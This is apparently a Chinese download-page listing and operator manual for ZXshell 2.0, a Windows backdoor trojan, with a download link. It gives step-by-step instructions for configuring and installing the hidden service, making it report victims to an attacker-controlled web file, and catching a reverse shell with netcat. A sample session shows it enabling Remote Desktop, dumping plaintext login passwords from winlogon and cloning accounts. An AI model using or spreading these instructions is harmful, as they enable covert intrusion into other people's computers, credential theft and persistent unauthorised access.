ZXshell2.0.rar提交时间:2004-08-16 提交用户:fatb 工具分类:后门程序 运行平台:Windows 工具大小:199245 Bytes 文件MD5 :64d9f58da4ffd6c7425a8fe692d3bcce 工具来源:www.idontknow.com ① 简介 这木马其中一部分是根据Bingle的关于svchost的原理写的,所以跟小榕的bits有相似的地方,加入了类似winshell及更多的的功能,和服务端上线通知的功能。 zxrecv.exe 是用来接收服务端发来的信息,也就是列出在线服务端的信息。 zxshell.exe 是用来配制服务端zxshell.dll。 zxsvc.ini 放在网络上通知服务端的文件。 nc.exe 用于连接服务端的 ② 工作原理 定时读取用户指定在网络上的一个文件,用户通过配置主页空间上的文件通知服务端作出相应响应。 关于服务端的上线通知的实现我引用网络神偷说明书中的一段话: ============================================================================ 本软件(网络神偷)用的是另一种更先进的方法:UDP通知,客户端上网后,会将 自己的IP地址写到主页空间的指定文件里,服务端定期读取这个文件的内容,就可得到 客户端的IP地址,并将自己的一些其它信息(主机名、IP地址、上线时间等等)用UDP协 议发送给客户端。 ============================================================================ 我只是初步模仿了原理,操作方面还得自己动手修改zxsvc.ini,亲自上传,相对麻烦,但是这样对于一些只支持web上传的免费空间则没有限制。 ③ 功能简介 A 进程管理器中看不到 B 平时没有端口,只是在系统中充当卧底的角色 C 提供正向连接和反向连接两种功能 D 服务端具有上线通知功能 E 仅适用于Windows2000/XP/2003 命令列表 注释 ? 显示此消息 info 系统版本信息 shell 获得系统命令提示符 download Http下载 list 列出所有进程 kill 结束指定进程 termsvc 设置终端服务 fpass 查看已登陆用户的密码 clone 克隆/删除任意用户 whoami 显示本服务的进程PID remove 禁用本服务 exit 退出但不关闭服务端 quit 退出并关闭服务端 reboot 重新启动计算机 shutdown 关闭计算机 ④ 使用方法 注意:首先必须有一个WEB空间用于上传 zxsvc.ini. 1、配置器的使用: 先从下拉菜单中任意选择一个将被代替的系统服务,然后填写一个可以从你的WEB空间下载zxsvc.ini的网址。 例如:http://www.xxx.com/zxsvc.ini 你也可以将zxsvc.ini改为其他名字,如 ip.txt,那么你填写的网址就是 http://www.xxx.com/ip.txt 确认无误后按生成按钮就可以得到配置好的zxshell.dll了。 2、安装卸装 安装 rundll32 zxshell.dll,I (逗号后的I注意区分大小写) 卸装 在telnet连上服务端后用remove命令 3、设置zxsvc.ini 用户在其他计算机安装了配置好的服务端后,必须将zxsvc.ini设置好后上传到配制服务端时设定的网址,下面介绍如何设置zxsvc.ini,该文件原始内容如下: 用户只能修“=”后面的内容! [zxconfig] MyIP=127.0.0.1 告诉服务端将UDP消息发给这个IP地址,也就是填你自己的IP Port=2004 告诉服务端打开这个端口等待连接 Password=123456 客户端连接时需要的密码 Banner=Password: 密码提示 BackConnect=0 “0”表示不采用反向连接,也就是打开端口等待连接,“1”表示通知服务端反向连接。 ServerID=123 当BackConnect=1时,这里填的数据就是要通知的服务端的ServerID号,该号在接收到的UDP消息中有提供 LocalPort=8080 当BackConnect=1时,必须配合nc.exe使用,在本地打开端口如:nc -l -p 8080,若想再次接收反弹shell必须使用另一个LocalPort! 设置好后先运行zxrecv.exe(接受服务端的信息),然后将zxsvc.ini上传到你的主页空间,位置必须对应在配制服务端时设定的网址,当服务端读取到该文本后先给MyIP发个信息(主机名、IP地址、ServerID号),再判断BackConnect的值,=0则打开Port等待连接,=1则判断ServerID是否与自己一样,如果是则向MyIP反弹Shell! 4、连接服务端 当zxrecv.exe收到信息时会有嘟嘟的响声,信息格式为:计算机名 @ IP地址 [ServerID] 例如: BillGates@211.21.x.x[2430] 根据你对zxsvc.ini设置, 如果BackConnect=0时也就是告诉服务端打开Port=2004的这个端口等待连接, 你可以选择windows系统自带的telnet进行连接登陆,方法如下: 打开附件中的命令提示符,然后输入: telnet 211.21.x.x 2004 或者使用著名的nc.exe,格式为: nc 211.21.x.x 2004 如果成功就会收到密码提示Password: 这时输入你在Password=设置的密码后按回车就可以登陆了,(注意选择windows系统自带的telnet时请使用主键盘的回车!) 登陆成功后会收到服务端的命令列表。 如果BackConnect=1时也就是告诉服务端反向连接,这时你需要配合nc.exe在本机监听端口, 比如:nc -l -p 888 那么你就打开了888端口等待服务端的连接, 这个时候就是要通知指定的服务端执行反连接了,你需要修改zxsvc.ini! 比如你的zxrecv.exe显示: HostName @ IP [ServerID] BillGates@211.21.x.x[2430] 那么zxsvc.ini需要改的键值: MyIP=这里当然还是你的IP BackConnect=1 ServerID=2430 LocalPort=888 重新将zxsvc.ini上传到服务器上!当服务端读取到新的数据后就会主动向你的888端口连接了! 得到的shell功能和正向连接一致! C:\>nc -l -p 888 命令列表 注释 ? 显示此消息 info 系统版本信息 shell 获得系统命令提示符 download Http下载 list 列出所有进程 kill 结束指定进程 termsvc 设置终端服务 fpass 查看已登陆用户的密码 clone 克隆/删除任意用户 whoami 显示本服务的进程PID remove 禁用本服务 exit 退出但不关闭服务端 quit 退出并关闭服务端 reboot 重新启动计算机 shutdown 关闭计算机 CMD>到此你想执行什么操作就键入对应的命令回车即可! CMD>info 系统版本:Windows XP Professional 语言:Simplified Chinese 驱动程序版本:07/01/2001,5.1.2600.0 命令成功完成。 CMD>shell Microsoft Windows XP [版本 5.1.2600] (C) 版权所有 1985-2001 Microsoft Corp. E:\hack>exit CMD>termsvc /////此命令可以开启2000\xp\2003的终端,如果是2000的则需要重新启动计算机。 当前的终端服务端口设置为: 3389 要重新设置端口吗? (y/n): n 当前计算机设置为[不允许]远程终端桌面连接. 要改变设置为[允许]吗? (y/n): y 命令成功完成。 CMD>fpass 查找登陆用户和密码[For WinNT\2000] 有些xp系统也会成功,可能跟设置为自动登陆有关系。 Process PID winlogon.exe 392 Domain And User: LZX-SERVER\zx 增加调试特权成功. 开始在进程PID: 392 中查找 LZX-SERVER\zx 的密码... 在 0x00e40800 找到一个长为 6 字节的编码口令. 获得计算机登陆的信息: 登陆域: LZX-SERVER 用户名: zx 密码: 520520. CMD>exit OK,到此就算可以结束了!希望使用者多提宝贵的意见!谢谢你的使用! 联系方式:Email: cnlzx@tom.com QQ: 5088090 ---- LZX 2004.07.29 >> 下载 << |
